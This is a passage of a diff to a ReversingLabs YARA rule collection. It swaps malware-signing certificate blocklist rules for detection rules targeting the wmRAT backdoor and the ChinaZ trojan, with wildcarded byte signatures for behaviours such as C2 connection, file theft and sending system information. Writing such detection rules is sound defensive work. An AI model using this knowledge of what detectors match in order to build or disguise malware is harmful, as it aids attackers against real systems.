+            48 8B 0F 48 85 C9 74 ?? FF 15 ?? ?? ?? ?? 48 89 1F 48 8D 4F ?? FF 15 ?? ?? ?? ?? 48
+            8D 4F ?? FF 15 ?? ?? ?? ?? 90 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8D
+            9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B 73 ?? 49 8B E3 41 5F 41 5E 41 5D 41 5C 5F C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FORTUNE STAR TRADING, INC." and pe.signatures [ i ] . serial == "32:23:b4:61:6c:26:87:c0:48:65:be:e8:32:17:26:a8" and 1601337600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $get_disk_information_p* ) ) and ( all of ( $get_os_information_p* ) ) and ( all of ( $take_screenshot_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_7709D2Df39E9A4F7Db2F3Cbc29B49743 : INFO FILE
+rule REVERSINGLABS_Win64_Backdoor_Wmrat : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects wmRAT backdoor."
 		author = "ReversingLabs"
-		id = "7227daa3-453d-5bb8-804c-8a97cd0d81c6"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "9ae75871-b08f-52cc-8588-a444d13ecd89"
+		date = "2025-03-17"
+		modified = "2025-03-17"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5232-L5248"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Win64.Backdoor.wmRAT.yara#L1-L144"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "c9ade45e0f9fb737a08ffa94d1fff89471a1cbcbacc139730fab88e382226d0b"
+		logic_hash = "23aadaf1571f23b3f02191e3079171c981d4969d0bd266d6db8c95fc091a1606"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "wmRAT"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Grina LLC" and pe.signatures [ i ] . serial == "77:09:d2:df:39:e9:a4:f7:db:2f:3c:bc:29:b4:97:43" and 1556353331 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_E29690E14518874D2Dcf00234Ae94F1F : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "6b4f26d3-b943-5a2e-bfb9-0e290031926a"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5250-L5268"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ef84815798b213dc49a142e3076cc6dd680dccabe72643fc86234024a46468f9"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$connect_to_c2 = {
+            6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C4 89 44 24 ??
+            A1 ?? ?? ?? ?? 33 C4 50 8D 44 24 ?? 64 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 66 A3 ?? ?? ?? ?? B8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? 66 A3 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 83 7C 24 ?? ?? 8B 44 24 ?? 73 ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 6A
+            ?? 6A ?? 6A ?? A3 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 A3 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 0D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 83 C8 ?? 8D
+            4C 24 ?? A3 ?? ?? ?? ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 32 C0 EB ?? 8D 4C 24 ?? C6 05
+            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? B0 ?? 8B 4C 24 ?? 64 89 0D
+            ?? ?? ?? ?? 59 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C3
+        }
+		$find_files_and_get_file_data_p1 = {
+            6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ??
+            ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 55 56 57 A1 ?? ?? ?? ?? 33 C4 50 8D 84 24 ?? ?? ??
+            ?? 64 A3 ?? ?? ?? ?? 33 DB 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 89 9C 24 ?? ?? ?? ??
+            FF 15 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 73 ?? 8D 84 24 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 89 8C 24 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 54 24 ?? C6 84 24 ?? ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 52 E8 ??
+            ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 3B C1 74
+            ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 8D 94 24 ?? ?? ?? ?? 52 50 FF 15 ?? ??
+            ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? F6 84 24 ?? ?? ?? ??
+            ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 53 51 89 9C 24 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF D5
+            8B 0D ?? ?? ?? ?? 66 8B 15 ?? ?? ?? ?? 83 C4 ?? 33 C0 89 84 24 ?? ?? ?? ?? 89 84 24
+            ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 8C 24 ?? ?? ?? ?? 89 84 24
+            ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? C7 84
+            24 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 94 24 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 8D 84 24 ??
+            ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 3B D3 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0
+            ?? 83 C1 ?? 66 3B D3 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 3B C3 0F 84 ?? ?? ?? ?? 8D 8C
+        }
+		$find_files_and_get_file_data_p2 = {
+            24 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 3B D3 74 ?? 66 8B 50
+            ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D3 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 3B
+            C3 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 53 50 89 9C 24 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 53 51 89 9C 24 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 54 24 ?? 8B C2 83 C4 ?? 8D 70 ?? EB ?? 8D 49 ?? 66 8B 08 83 C0 ?? 66 3B
+            CB 75 ?? 2B C6 D1 F8 8D 44 00 ?? 50 52 8D 8C 24 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8D 94
+            24 ?? ?? ?? ?? 52 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF D5 8D 8C 24 ?? ?? ?? ??
+            51 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 FF D5 83 C4 ?? 8D 44 24 ?? 68 ?? ?? ?? ??
+            8D 8C 24 ?? ?? ?? ?? 89 44 24 ?? 51 8D 44 24 ?? E8 ?? ?? ?? ?? 8D 54 24 ?? C6 84 24
+            ?? ?? ?? ?? ?? 8B 4C 24 ?? 52 E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 8D
+            4C 24 ?? 3B C1 74 ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B 54 24 ?? 52 8D 8C 24 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 83 EC ?? 8B CC 89 64 24 ?? 68 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C6 68 ?? ?? ?? ?? 50 FF
+            15 ?? ?? ?? ?? 83 C4 ?? 84 C0 74 ?? FF 05 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 52 8D 84 24 ?? ?? ?? ?? 89 8C 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 44 24 ?? C6 84 24 ?? ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ??
+            50 E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 8D 8C 24
+        }
+		$find_files_and_get_file_data_p3 = {
+            3B C1 74 ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 8B 54 24 ?? 52 8D 8C 24 ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? 83 EC ?? 8D 84 24 ?? ?? ?? ?? 8B CC 89 64 24 ?? 50 FF 15 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 33 C0 0F B7 D0 8B C2 C1 E2 ?? 0B C2 B9 ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? F3 AB
+            83 C4 ?? 8D 8C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C6 84 24 ??
+            ?? ?? ?? ?? 8B 44 24 ?? 83 C0 ?? 8D 48 ?? 83 CA ?? F0 0F C1 11 4A 85 D2 7F ?? 8B 08
+            8B 11 50 8B 42 ?? FF D0 8D 8C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? C6 84 24 ?? ?? ?? ?? ?? 8B 44 24 ?? E9 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 3B C3 8B
+            8C 24 ?? ?? ?? ?? 89 4C 24 ?? 89 44 24 ?? 0F 8C ?? ?? ?? ?? 7F ?? 3B CB 0F 86 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 53 51 89 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B 54 24 ?? 8B C2 83 C4 ?? 8D 70 ?? 8D 64 24 ?? 66 8B 08 83 C0 ?? 66 3B CB 75 ?? 2B
+            C6 D1 F8 8D 44 00 ?? 50 52 8D 8C 24 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ??
+            ?? 83 C4 ?? 8B D0 8B FF 66 8B 08 83 C0 ?? 66 3B CB 75 ?? 8D BC 24 ?? ?? ?? ?? 2B C2
+            83 C7 ?? EB ?? 8D A4 24 ?? ?? ?? ?? 66 8B 4F ?? 83 C7 ?? 66 3B CB 75 ?? DF 6C 24 ??
+            8B C8 C1 E9 ?? 8B F2 DC 05 ?? ?? ?? ?? F3 A5 DD 1D ?? ?? ?? ?? 8B C8 68
+        }
+		$find_files_and_get_file_data_p4 = {
+            8D 84 24 ?? ?? ?? ?? 83 E1 ?? 8D 94 24 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? F3 A4 89
+            94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? C6 84 24 ?? ?? ?? ?? ?? 51 8B 8C 24 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 8D 94 24 ?? ??
+            ?? ?? 3B C2 74 ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 50 8D 8C 24 ?? ?? ?? ??
+            FF 15 ?? ?? ?? ?? FF 05 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C6 84 24
+            ?? ?? ?? ?? ?? 8B 44 24 ?? 83 C0 ?? 83 CA ?? 8D 48 ?? F0 0F C1 11 4A 85 D2 7F ?? 8B
+            08 8B 11 50 8B 42 ?? FF D0 8B 74 24 ?? 8D 8C 24 ?? ?? ?? ?? 51 56 FF 15 ?? ?? ?? ??
+            85 C0 0F 85 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 88 9C 24 ?? ?? ?? ?? 8B 44 24 ?? 83 C0
+            ?? 8D 50 ?? 83 C9 ?? F0 0F C1 0A 49 85 C9 7F ?? 8B 08 8B 11 50 8B 42 ?? FF D0 8D 8C
+            24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ??
+            ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5D 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 81
+            C4 ?? ?? ?? ?? C3
+        }
+		$receive_data_and_write_to_file = {
+            C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 8B 4C 24 ?? 51 E8 ??
+            ?? ?? ?? 8B 7C 24 ?? 8B F0 83 C4 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 75 ?? 68 ?? ??
+            ?? ?? 8D 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 83 EC ?? 8B D4 C7 84 24 ?? ?? ??
+            ?? ?? ?? ?? ?? 89 64 24 ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 52 FF 15 ?? ?? ??
+            ?? 83 C4 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 4C 24 ??
+            51 56 B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 54 24 ?? 01 15 ?? ?? ?? ?? 56 E8 ?? ?? ??
+            ?? 83 C4 ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
+            8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 83 EC ?? 8B C4 C7 84 24 ?? ?? ?? ?? ?? ??
+            ?? ?? 89 64 24 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 51 50 E9
+        }
+		$get_system_information = {
+            6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C4 89 44 24 ??
+            53 55 56 57 A1 ?? ?? ?? ?? 33 C4 50 8D 44 24 ?? 64 A3 ?? ?? ?? ?? 8B 1D ?? ?? ?? ??
+            33 F6 BD ?? ?? ?? ?? 83 CF ?? E8 ?? ?? ?? ?? 66 A1 ?? ?? ?? ?? 8A 0D ?? ?? ?? ?? 66
+            89 44 24 ?? 88 4C 24 ?? FF 15 ?? ?? ?? ?? 89 44 24 ?? 3B C6 74 ?? 8D 9B ?? ?? ?? ??
+            A8 ?? 74 ?? 8D 54 24 ?? 52 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ??
+            89 74 24 ?? FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 89
+            7C 24 ?? FF 15 ?? ?? ?? ?? 8B 44 24 ?? FE 44 24 ?? D1 E8 89 44 24 ?? 75 ?? 8D 4C 24
+            ?? 51 E8 ?? ?? ?? ?? 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF D3 83 ED ?? 0F
+            85 ?? ?? ?? ?? 8B 4C 24 ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5D 5B 8B 4C 24 ?? 33 CC E8
+            ?? ?? ?? ?? 83 C4 ?? C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GRIND & TAMP ENTERPRISES PTY LTD" and ( pe.signatures [ i ] . serial == "00:e2:96:90:e1:45:18:87:4d:2d:cf:00:23:4a:e9:4f:1f" or pe.signatures [ i ] . serial == "e2:96:90:e1:45:18:87:4d:2d:cf:00:23:4a:e9:4f:1f" ) and 1570838400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $connect_to_c2 ) and ( all of ( $find_files_and_get_file_data_p* ) ) and ( $receive_data_and_write_to_file ) and ( $get_system_information )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_Cfac705C7E6845904F99995324F7562C : INFO FILE
+rule REVERSINGLABS_Linux_Trojan_Chinaz : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects ChinaZ trojan."
 		author = "ReversingLabs"
-		id = "42aa3105-a077-5962-8d5d-50429254582b"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "f99c224b-db54-5cae-b5fb-8939ebee3250"
+		date = "2024-07-31"
+		modified = "2024-07-31"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5270-L5288"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Linux.Trojan.ChinaZ.yara#L1-L246"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "68bcfe60c2e7154f427c20d0471ede99e55c8200149a4438d5a2a75982fcd419"
+		logic_hash = "d8d08f4f3f36ecc7b219b6b1aae3c76d26e8fb3a44444763929190c6124532ff"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Trojan"
+		tc_detection_name = "ChinaZ"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HMWOCFPSDLAFMFZIVD" and ( pe.signatures [ i ] . serial == "cf:ac:70:5c:7e:68:45:90:4f:99:99:53:24:f7:56:2c" or pe.signatures [ i ] . serial == "30:53:8f:a3:81:97:ba:6f:b0:66:66:ac:db:08:a9:d4" ) and 1601918720 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_A7989F8Be0C82D35A19E7B3Dd4Be30E5 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "21d54d40-442e-50f5-a561-41b3d6239bac"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5290-L5308"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a50129908a471e6692bcf663abd5ef52861d4a46fdf528f39efe816ee6150edf"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$collect_system_information_32_p1 = {
+            55 57 56 53 81 EC ?? ?? ?? ?? 8D 5C 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ??
+            ?? 89 44 24 ?? 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24
+            ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 31 31 C9 89 C6 8D 44 24 ?? 31
+            FF C7 44 24 ?? ?? ?? ?? ?? 01 CE 89 04 24 11 D7 E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 0F 31 89 C1 31 C0 31 DB 01 C1 8D 44 24 ?? 11 D3 C7 44 24 ?? ?? ?? ??
+            ?? 89 04 24 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? 8B 44 24 ?? C7 04 24 ?? ?? ?? ??
+            29 F1 19 FB 31 ED 2B 44 24 ?? 89 4C 24 ?? 8D B4 24 ?? ?? ?? ?? 89 5C 24 ?? 89 F7 69
+            C0 ?? ?? ?? ?? DF 6C 24 ?? 03 44 24 ?? 2B 44 24 ?? D9 7C 24 ?? 89 44 24 ?? DB 44 24
+            ?? DE F9 0F B7 44 24 ?? B4 ?? 66 89 44 24 ?? D9 6C 24 ?? DB 5C 24 ?? D9 6C 24 ?? 8B
+            5C 24 ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C 24 ??
+            8D 9C 24 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? A1
+        }
+		$collect_system_information_32_p2 = {
+            C7 04 24 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 44 24 ?? ?? ??
+            ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 89 E8 B9 ?? ?? ?? ?? F3 AB 89
+            DF B1 ?? F3 AB 89 DF 89 5C 24 ?? 89 74 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
+            44 24 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 C7 44 24 ?? ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 54 24 ?? 89 E8 B9 ?? ?? ?? ?? F3 AB 89 F7 C7 44 24 ?? ?? ?? ?? ?? 89 D0
+            C1 F8 ?? C1 E8 ?? 01 D0 C1 F8 ?? 89 44 24 ?? 89 1C 24 89 44 24 ?? E8 ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? 89 5C 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 C2 A1 ?? ?? ??
+            ?? 89 54 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 89 E8 B9 ?? ?? ?? ?? F3 AB 89 DF B1 ?? F3
+            AB 89 5C 24 ?? 89 74 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 54 24 ?? 85 D2 0F
+            85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? A1 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04
+            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
+            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 5B 5E 5F 5D
+            C3
+        }
+		$send_system_info_32 = {
+            57 56 53 81 EC ?? ?? ?? ?? 8D 5C 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ??
+            89 44 24 ?? 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            0F 31 31 C9 89 C6 8D 44 24 ?? 31 FF C7 44 24 ?? ?? ?? ?? ?? 01 CE 89 04 24 11 D7 E8
+            ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 31 89 C1 31 C0 31 DB 01 C1 8D 44
+            24 ?? 11 D3 C7 44 24 ?? ?? ?? ?? ?? 89 04 24 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 4C 24 ??
+            8B 44 24 ?? C7 04 24 ?? ?? ?? ?? 29 F1 19 FB 2B 44 24 ?? 89 4C 24 ?? 89 5C 24 ?? 69
+            C0 ?? ?? ?? ?? DF 6C 24 ?? 03 44 24 ?? 2B 44 24 ?? D9 7C 24 ?? 89 44 24 ?? DB 44 24
+            ?? DE F9 0F B7 44 24 ?? B4 ?? 66 89 44 24 ?? D9 6C 24 ?? DB 5C 24 ?? D9 6C 24 ?? 8B
+            5C 24 ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C 24 ??
+            C7 04 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? 89 44 24 ?? C7 04 24 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
+            89 04 24 E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5B 5E 5F C3
+        }
+		$parse_c2_commands_32 = {
+            55 31 C0 57 B9 ?? ?? ?? ?? 56 53 81 EC ?? ?? ?? ?? 8D 9C 24 ?? ?? ?? ?? 0F B6 94 24
+            ?? ?? ?? ?? 89 DF F3 AB C7 04 24 ?? ?? ?? ?? 88 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
+            84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 83 E0 ?? 89 84 24 ?? ?? ?? ?? 90 A1 ?? ?? ??
+            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C 24 ?? 89 04 24 E8 ?? ?? ??
+            ?? 85 C0 0F 84 ?? ?? ?? ?? 8B B4 24 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? 89 74 24 ??
+            C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 83 F8 ?? 74 ?? 83 F8 ?? 0F
+            84 ?? ?? ?? ?? 83 FE ?? 0F 84 ?? ?? ?? ?? 83 FE ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84
